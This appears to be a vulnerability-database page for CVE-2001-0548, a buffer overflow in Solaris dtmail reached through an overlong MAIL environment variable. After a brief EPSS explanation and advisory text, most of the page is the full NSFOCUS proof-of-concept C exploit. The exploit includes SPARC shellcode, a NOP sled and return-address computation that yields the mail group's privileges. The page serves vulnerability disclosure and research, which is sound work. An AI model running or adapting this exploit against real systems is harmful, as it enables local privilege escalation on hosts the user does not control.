CVE-2001-0548 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/3081/info dtmail is an application included with the Common Desktop Environment, one of the X Window Managers included with Solaris. A buffer overflow in dtmail makes it possible for a local user to gain elevated privileges. Due to improper bounds checking, it is possible to cause a buffer overflow in dtmail by filling the MAIL environment variable with 2000 or more characters. This results in the overwriting of stack variables, including the return address, and can allow a local user to gain an effective GID of mail. /* * sol_sparc_dtmail_MAIL_ex.c - Proof of Concept Code for dtmail $MAIL overflow bug. * * Copyright (c) 2001 - Nsfocus.com * * It will run "/bin/id" if the exploit succeed. * Tested in Solaris 2.6/7 (SPARC). * * DISCLAIMS: * This is a proof of concept code. This code is for test purpose * only and should not be run against any host without permission from * the system administrator. * * NSFOCUS Security Team <[email protected]> * http://www.nsfocus.com */ #include <stdio.h> #include <stdlib.h> #include <sys/systeminfo.h> #include <pwd.h> struct passwd *pwd;; #define SP 0xffbefffc /* default bottom stack address (Solaris 7/8) */ #define DISPENV "DISPLAY=127.0.0.1:0.0" #define VULPROG "/usr/dt/bin/dtmail" #define NOP 0xaa1d4015 /* "xor %l5, %l5, %l5" */ char shellcode[] = "\x90\x08\x3f\xff\x90\x02\x20\x06\x82\x10\x20\x88\x91\xd0\x20\x08" "\x90\x08\x3f\xff\x90\x02\x20\x06\x82\x10\x20\x2e\x91\xd0\x20\x08" "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\x59\x90\x0b\x80\x0e" "\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14\xec\x3b\xbf\xec" "\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b" "\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08"; /* get current stack point address */ long get_sp(void) { __asm__("mov %sp,%i0"); } long get_shelladdr(long sp_addr, char **arg, char **env, long off) { long retaddr; int i; char plat[256]; char pad = 0, pad1 = 0, pad2; int env_len, arg_len, len; while (1) { /* calculate the length of "VULPROG" + argv[] */ for (i = 0, arg_len = 0; arg[i] != NULL; i++) { arg_len += strlen(arg[i]) + 1; } /* calculate the pad nummber . */ pad = 3 - arg_len % 4; memset(env[0], 'A', pad); env[0][pad] = '\0'; memset(env[2], 'A', pad1); env[2][pad1] = '\0'; /* get environ length */ for (i = 0, env_len = 0; env[i] != NULL; i++) { env_len += strlen(env[i]) + 1; } /* get platform info */ sysinfo(SI_PLATFORM, plat, 256); len = arg_len + env_len + strlen(plat) + 1 + strlen(VULPROG) + 1; pad2 = 4 - len % 4; /* get the exact shellcode address */ retaddr = sp_addr - pad2 /* the trailing zero number */ - strlen(VULPROG) - 1 - strlen(plat) - 1; for (i--; i > 0; i--) retaddr -= strlen(env[i]) + 1; if (!((retaddr + off) & 0xff)) { pad1 += 8; continue; } else if ((retaddr + off) % 8) { pad1 += 4; continue; } else break; } return retaddr; } /* End of get_shelladdr */ int main(int argc, char **argv) { char buf[4096], home[128], display[256]; char eggbuf[2048]; long retaddr, sp_addr = SP; char *arg[24], *env[24], *cwd, *charptr; char padding[64], padding1[64]; unsigned int *ptr; char *disp; char ev1[] = "MAIL="; long ev1_len, i, align; long overbuflen = 2048; if (argc > 1) snprintf(display, sizeof(display) - 1, "DISPLAY=%s", argv[1]); else { disp = getenv("DISPLAY"); if (disp) snprintf(display, sizeof(display) - 1, "DISPLAY=%s", disp); else strncpy(display, DISPENV, sizeof(display) - 1); } pwd = getpwuid((uid_t) getuid()); snprintf(home, 127, "HOME=%s", strdup(pwd->pw_dir)); arg[0] = VULPROG; arg[1] = NULL; cwd = getcwd((char *) NULL, 256); overbuflen = overbuflen - (strlen(cwd) + strlen("/")); ev1_len = strlen(ev1); bzero(buf, sizeof(buf)); memcpy(buf, ev1, ev1_len); memset(buf + ev1_len, 'A', overbuflen); bzero(eggbuf, sizeof(eggbuf)); ptr = (unsigned int *) eggbuf; for (i = 0; i < sizeof(eggbuf) - strlen(shellcode); i += 4) *(ptr + i / 4) = NOP; memcpy(eggbuf + i - 4, shellcode, strlen(shellcode)); env[0] = padding; /* put padding buffer in env */ env[1] = eggbuf; /* put shellcode in env */ env[2] = padding1; /* put padding1 buffer in env */ env[3] = buf; /* put overflow environ */ env[4] = display; /* put display environ */ env[5] = home; /* put home environ */ env[6] = NULL; /* end of env */ /* get stack bottom address */ if (((unsigned char) (get_sp() >> 24)) == 0xef) { /* Solaris 2.6 */ sp_addr = SP - 0x0fbf0000; } retaddr = get_shelladdr(sp_addr, arg, env, -8); retaddr -= 8; printf("Using return address = 0x%x (shelladdrr - 8)\n", retaddr); printf("Click Local in your X window\n\n"); charptr = (char *) &retaddr; align = 4 - ((strlen(cwd) + strlen("/")) % 4); for (i = 0; i < overbuflen - align; i++) buf[ev1_len + align + i] = *(charptr + i % 4); execve(VULPROG, arg, env); perror("execle"); } /* End of main */